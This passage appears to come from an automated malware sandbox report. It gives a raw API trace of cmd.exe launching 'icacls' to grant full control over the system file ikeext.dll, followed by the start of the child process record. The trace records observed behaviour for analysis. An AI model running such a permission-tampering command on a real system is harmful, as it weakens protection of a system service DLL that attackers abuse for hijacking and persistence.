lpcbData=0x12e9b8*=0x4) returned 0x0 [0048.017] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x0, lpData=0x12e9c0*=0x40, lpcbData=0x12e9b8*=0x1000) returned 0x2 [0048.017] RegCloseKey (hKey=0x40) returned 0x0 [0048.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9b4 | out: phkResult=0x12e9b4*=0x40) returned 0x0 [0048.018] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x0, lpData=0x12e9c0*=0x40, lpcbData=0x12e9b8*=0x1000) returned 0x2 [0048.018] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x4, lpData=0x12e9c0*=0x1, lpcbData=0x12e9b8*=0x4) returned 0x0 [0048.018] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x0, lpData=0x12e9c0*=0x1, lpcbData=0x12e9b8*=0x1000) returned 0x2 [0048.018] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x4, lpData=0x12e9c0*=0x0, lpcbData=0x12e9b8*=0x4) returned 0x0 [0048.018] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x4, lpData=0x12e9c0*=0x9, lpcbData=0x12e9b8*=0x4) returned 0x0 [0048.018] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x4, lpData=0x12e9c0*=0x9, lpcbData=0x12e9b8*=0x4) returned 0x0 [0048.018] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x0, lpData=0x12e9c0*=0x9, lpcbData=0x12e9b8*=0x1000) returned 0x2 [0048.018] RegCloseKey (hKey=0x40) returned 0x0 [0048.018] time (in: timer=0x0 | out: timer=0x0) returned 0x59ddfa0f [0048.018] srand (_Seed=0x59ddfa0f) [0048.018] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant system:F\"" [0048.018] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant system:F\"" [0048.018] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.018] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x291980, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0048.018] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.018] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.018] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.018] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0048.018] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0048.018] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0048.018] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0048.018] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0048.018] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0048.019] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0048.019] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0048.019] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0048.019] GetEnvironmentStringsW () returned 0x2923c0* [0048.019] FreeEnvironmentStringsW (penv=0x2923c0) returned 1 [0048.019] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.019] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.019] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0048.019] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0048.019] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0048.019] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0048.019] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0048.019] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0048.019] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0048.019] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0048.019] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f780 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x12f780, lpFilePart=0x12f77c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x12f77c*="system32") returned 0x13 [0048.019] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0048.019] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x12f4fc | out: lpFindFileData=0x12f4fc) returned 0x290960 [0048.020] FindClose (in: hFindFile=0x290960 | out: hFindFile=0x290960) returned 1 [0048.020] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x12f4fc | out: lpFindFileData=0x12f4fc) returned 0x290960 [0048.020] FindClose (in: hFindFile=0x290960 | out: hFindFile=0x290960) returned 1 [0048.020] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0048.020] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0048.020] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0048.020] GetEnvironmentStringsW () returned 0x290130* [0048.020] FreeEnvironmentStringsW (penv=0x290130) returned 1 [0048.020] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.022] _wcsnicmp (_String1="icac", _String2="cmd ", _MaxCount=0x4) returned 6 [0048.022] SetErrorMode (uMode=0x0) returned 0x8001 [0048.022] SetErrorMode (uMode=0x1) returned 0x0 [0048.022] GetFullPathNameW (in: lpFileName="icacls C:\\Windows\\system32\\ikeext.dll \\.", nBufferLength=0x208, lpBuffer=0x280880, lpFilePart=0x12f6f8 | out: lpBuffer="C:\\Windows\\system32\\icacls C:\\Windows\\system32\\ikeext.dll", lpFilePart=0x12f6f8*="ikeext.dll") returned 0x39 [0048.022] SetErrorMode (uMode=0x8001) returned 0x1 [0048.022] NeedCurrentDirectoryForExePathW (ExeName="icacls C:\\Windows\\system32\\ikeext.dll \\.") returned 1 [0048.022] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.025] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.025] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\icacls C:\\Windows\\system32\\ikeext.dll\\grant system:F.*", fInfoLevelId=0x1, lpFindFileData=0x12f474, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f474) returned 0xffffffff [0048.025] GetLastError () returned 0x7b [0048.025] GetConsoleOutputCP () returned 0x1b5 [0048.026] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.026] GetUserDefaultLCID () returned 0x409 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e74950, cchData=8 | out: lpLCData=":") returned 2 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8c0, cchData=128 | out: lpLCData="0") returned 2 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8c0, cchData=128 | out: lpLCData="0") returned 2 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8c0, cchData=128 | out: lpLCData="1") returned 2 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e74940, cchData=8 | out: lpLCData="/") returned 2 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e74d80, cchData=32 | out: lpLCData="Mon") returned 4 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e74d40, cchData=32 | out: lpLCData="Tue") returned 4 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e74d00, cchData=32 | out: lpLCData="Wed") returned 4 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e74cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e74c80, cchData=32 | out: lpLCData="Fri") returned 4 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e74c40, cchData=32 | out: lpLCData="Sat") returned 4 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e74c00, cchData=32 | out: lpLCData="Sun") returned 4 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e74930, cchData=8 | out: lpLCData=".") returned 2 [0048.026] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e74920, cchData=8 | out: lpLCData=",") returned 2 [0048.026] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0048.027] GetConsoleTitleW (in: lpConsoleTitle=0x280ac0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.027] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0048.027] GetProcAddress (hModule=0x76590000, lpProcName="CopyFileExW") returned 0x765cac6c [0048.027] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0048.028] GetProcAddress (hModule=0x76590000, lpProcName="SetConsoleInputExeNameW") returned 0x765e2732 [0048.028] _wcsicmp (_String1="icacls", _String2=")") returned 64 [0048.028] _wcsicmp (_String1="FOR", _String2="icacls") returned -3 [0048.028] _wcsicmp (_String1="FOR/?", _String2="icacls") returned -3 [0048.028] _wcsicmp (_String1="IF", _String2="icacls") returned 3 [0048.028] _wcsicmp (_String1="IF/?", _String2="icacls") returned 3 [0048.028] _wcsicmp (_String1="REM", _String2="icacls") returned 9 [0048.028] _wcsicmp (_String1="REM/?", _String2="icacls") returned 9 [0048.030] GetConsoleTitleW (in: lpConsoleTitle=0x12f5b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.030] _wcsicmp (_String1="icacls", _String2="DIR") returned 5 [0048.030] _wcsicmp (_String1="icacls", _String2="ERASE") returned 4 [0048.030] _wcsicmp (_String1="icacls", _String2="DEL") returned 5 [0048.030] _wcsicmp (_String1="icacls", _String2="TYPE") returned -11 [0048.030] _wcsicmp (_String1="icacls", _String2="COPY") returned 6 [0048.030] _wcsicmp (_String1="icacls", _String2="CD") returned 6 [0048.030] _wcsicmp (_String1="icacls", _String2="CHDIR") returned 6 [0048.030] _wcsicmp (_String1="icacls", _String2="RENAME") returned -9 [0048.030] _wcsicmp (_String1="icacls", _String2="REN") returned -9 [0048.030] _wcsicmp (_String1="icacls", _String2="ECHO") returned 4 [0048.030] _wcsicmp (_String1="icacls", _String2="SET") returned -10 [0048.030] _wcsicmp (_String1="icacls", _String2="PAUSE") returned -7 [0048.030] _wcsicmp (_String1="icacls", _String2="DATE") returned 5 [0048.030] _wcsicmp (_String1="icacls", _String2="TIME") returned -11 [0048.030] _wcsicmp (_String1="icacls", _String2="PROMPT") returned -7 [0048.030] _wcsicmp (_String1="icacls", _String2="MD") returned -4 [0048.030] _wcsicmp (_String1="icacls", _String2="MKDIR") returned -4 [0048.030] _wcsicmp (_String1="icacls", _String2="RD") returned -9 [0048.030] _wcsicmp (_String1="icacls", _String2="RMDIR") returned -9 [0048.030] _wcsicmp (_String1="icacls", _String2="PATH") returned -7 [0048.030] _wcsicmp (_String1="icacls", _String2="GOTO") returned 2 [0048.030] _wcsicmp (_String1="icacls", _String2="SHIFT") returned -10 [0048.030] _wcsicmp (_String1="icacls", _String2="CLS") returned 6 [0048.030] _wcsicmp (_String1="icacls", _String2="CALL") returned 6 [0048.030] _wcsicmp (_String1="icacls", _String2="VERIFY") returned -13 [0048.030] _wcsicmp (_String1="icacls", _String2="VER") returned -13 [0048.031] _wcsicmp (_String1="icacls", _String2="VOL") returned -13 [0048.031] _wcsicmp (_String1="icacls", _String2="EXIT") returned 4 [0048.031] _wcsicmp (_String1="icacls", _String2="SETLOCAL") returned -10 [0048.031] _wcsicmp (_String1="icacls", _String2="ENDLOCAL") returned 4 [0048.031] _wcsicmp (_String1="icacls", _String2="TITLE") returned -11 [0048.031] _wcsicmp (_String1="icacls", _String2="START") returned -10 [0048.031] _wcsicmp (_String1="icacls", _String2="DPATH") returned 5 [0048.031] _wcsicmp (_String1="icacls", _String2="KEYS") returned -2 [0048.031] _wcsicmp (_String1="icacls", _String2="MOVE") returned -4 [0048.031] _wcsicmp (_String1="icacls", _String2="PUSHD") returned -7 [0048.031] _wcsicmp (_String1="icacls", _String2="POPD") returned -7 [0048.031] _wcsicmp (_String1="icacls", _String2="ASSOC") returned 8 [0048.031] _wcsicmp (_String1="icacls", _String2="FTYPE") returned 3 [0048.031] _wcsicmp (_String1="icacls", _String2="BREAK") returned 7 [0048.031] _wcsicmp (_String1="icacls", _String2="COLOR") returned 6 [0048.031] _wcsicmp (_String1="icacls", _String2="MKLINK") returned -4 [0048.031] _wcsicmp (_String1="icacls", _String2="DIR") returned 5 [0048.031] _wcsicmp (_String1="icacls", _String2="ERASE") returned 4 [0048.031] _wcsicmp (_String1="icacls", _String2="DEL") returned 5 [0048.031] _wcsicmp (_String1="icacls", _String2="TYPE") returned -11 [0048.031] _wcsicmp (_String1="icacls", _String2="COPY") returned 6 [0048.031] _wcsicmp (_String1="icacls", _String2="CD") returned 6 [0048.031] _wcsicmp (_String1="icacls", _String2="CHDIR") returned 6 [0048.031] _wcsicmp (_String1="icacls", _String2="RENAME") returned -9 [0048.031] _wcsicmp (_String1="icacls", _String2="REN") returned -9 [0048.031] _wcsicmp (_String1="icacls", _String2="ECHO") returned 4 [0048.031] _wcsicmp (_String1="icacls", _String2="SET") returned -10 [0048.031] _wcsicmp (_String1="icacls", _String2="PAUSE") returned -7 [0048.031] _wcsicmp (_String1="icacls", _String2="DATE") returned 5 [0048.032] _wcsicmp (_String1="icacls", _String2="TIME") returned -11 [0048.032] _wcsicmp (_String1="icacls", _String2="PROMPT") returned -7 [0048.032] _wcsicmp (_String1="icacls", _String2="MD") returned -4 [0048.032] _wcsicmp (_String1="icacls", _String2="MKDIR") returned -4 [0048.032] _wcsicmp (_String1="icacls", _String2="RD") returned -9 [0048.032] _wcsicmp (_String1="icacls", _String2="RMDIR") returned -9 [0048.032] _wcsicmp (_String1="icacls", _String2="PATH") returned -7 [0048.032] _wcsicmp (_String1="icacls", _String2="GOTO") returned 2 [0048.032] _wcsicmp (_String1="icacls", _String2="SHIFT") returned -10 [0048.032] _wcsicmp (_String1="icacls", _String2="CLS") returned 6 [0048.032] _wcsicmp (_String1="icacls", _String2="CALL") returned 6 [0048.032] _wcsicmp (_String1="icacls", _String2="VERIFY") returned -13 [0048.032] _wcsicmp (_String1="icacls", _String2="VER") returned -13 [0048.032] _wcsicmp (_String1="icacls", _String2="VOL") returned -13 [0048.032] _wcsicmp (_String1="icacls", _String2="EXIT") returned 4 [0048.032] _wcsicmp (_String1="icacls", _String2="SETLOCAL") returned -10 [0048.032] _wcsicmp (_String1="icacls", _String2="ENDLOCAL") returned 4 [0048.032] _wcsicmp (_String1="icacls", _String2="TITLE") returned -11 [0048.032] _wcsicmp (_String1="icacls", _String2="START") returned -10 [0048.032] _wcsicmp (_String1="icacls", _String2="DPATH") returned 5 [0048.032] _wcsicmp (_String1="icacls", _String2="KEYS") returned -2 [0048.032] _wcsicmp (_String1="icacls", _String2="MOVE") returned -4 [0048.032] _wcsicmp (_String1="icacls", _String2="PUSHD") returned -7 [0048.032] _wcsicmp (_String1="icacls", _String2="POPD") returned -7 [0048.032] _wcsicmp (_String1="icacls", _String2="ASSOC") returned 8 [0048.032] _wcsicmp (_String1="icacls", _String2="FTYPE") returned 3 [0048.032] _wcsicmp (_String1="icacls", _String2="BREAK") returned 7 [0048.032] _wcsicmp (_String1="icacls", _String2="COLOR") returned 6 [0048.032] _wcsicmp (_String1="icacls", _String2="MKLINK") returned -4 [0048.032] _wcsicmp (_String1="icacls", _String2="FOR") returned 3 [0048.032] _wcsicmp (_String1="icacls", _String2="IF") returned -3 [0048.032] _wcsicmp (_String1="icacls", _String2="REM") returned -9 [0048.033] _wcsnicmp (_String1="icac", _String2="cmd ", _MaxCount=0x4) returned 6 [0048.033] SetErrorMode (uMode=0x0) returned 0x8001 [0048.033] SetErrorMode (uMode=0x1) returned 0x0 [0048.033] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x291c18, lpFilePart=0x12f0d8 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x12f0d8*="system32") returned 0x13 [0048.033] SetErrorMode (uMode=0x8001) returned 0x1 [0048.033] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.033] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.035] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.035] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.035] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\icacls.*", fInfoLevelId=0x1, lpFindFileData=0x12ee54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ee54) returned 0x291ee8 [0048.035] FindClose (in: hFindFile=0x291ee8 | out: hFindFile=0x291ee8) returned 1 [0048.036] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\icacls.COM", fInfoLevelId=0x1, lpFindFileData=0x12ee54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ee54) returned 0xffffffff [0048.036] GetLastError () returned 0x2 [0048.036] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\icacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x12ee54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ee54) returned 0x291ee8 [0048.036] FindClose (in: hFindFile=0x291ee8 | out: hFindFile=0x291ee8) returned 1 [0048.036] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0048.036] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0048.036] GetConsoleTitleW (in: lpConsoleTitle=0x12f34c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.036] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f1d4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f29c | out: lpAttributeList=0x12f1d4, lpSize=0x12f29c) returned 1 [0048.036] UpdateProcThreadAttribute (in: lpAttributeList=0x12f1d4, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f294, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f1d4, lpPreviousValue=0x0) returned 1 [0048.036] GetStartupInfoW (in: lpStartupInfo=0x12f190 | out: lpStartupInfo=0x12f190*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.036] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0048.037] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0048.037] lstrcmpW (lpString1="\\icacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0048.038] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\icacls.exe", lpCommandLine="icacls C:\\Windows\\system32\\ikeext.dll /grant system:F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x12f230*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="icacls C:\\Windows\\system32\\ikeext.dll /grant system:F", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f27c | out: lpCommandLine="icacls C:\\Windows\\system32\\ikeext.dll /grant system:F", lpProcessInformation=0x12f27c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbd4, dwThreadId=0xbd8)) returned 1 [0048.146] CloseHandle (hObject=0x4c) returned 1 [0048.146] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0048.146] GetEnvironmentStringsW () returned 0x290130* [0048.146] FreeEnvironmentStringsW (penv=0x290130) returned 1 [0048.146] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0048.244] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f170 | out: lpExitCode=0x12f170*=0x0) returned 1 [0048.244] CloseHandle (hObject=0x50) returned 1 [0048.244] _vsnwprintf (in: _Buffer=0x12f2b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f17c | out: _Buffer="00000000") returned 8 [0048.244] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0048.244] GetEnvironmentStringsW () returned 0x292128* [0048.244] FreeEnvironmentStringsW (penv=0x292128) returned 1 [0048.244] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0048.244] GetEnvironmentStringsW () returned 0x292128* [0048.244] FreeEnvironmentStringsW (penv=0x292128) returned 1 [0048.244] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f1d4 | out: lpAttributeList=0x12f1d4) [0048.244] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.244] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0048.245] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.245] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0048.245] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.245] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0048.245] SetConsoleInputExeNameW () returned 0x1 [0048.245] GetConsoleOutputCP () returned 0x1b5 [0048.245] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.245] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.245] exit (_Code=0) Process: id = "13" image_name = "icacls.exe" filename = "c:\\windows\\system32\\icacls.exe" page_root = "0x7eef77c0" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xbc0" cmd_line = "icacls C:\\Windows\\system32\\ikeext.dll /grant system:F" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT 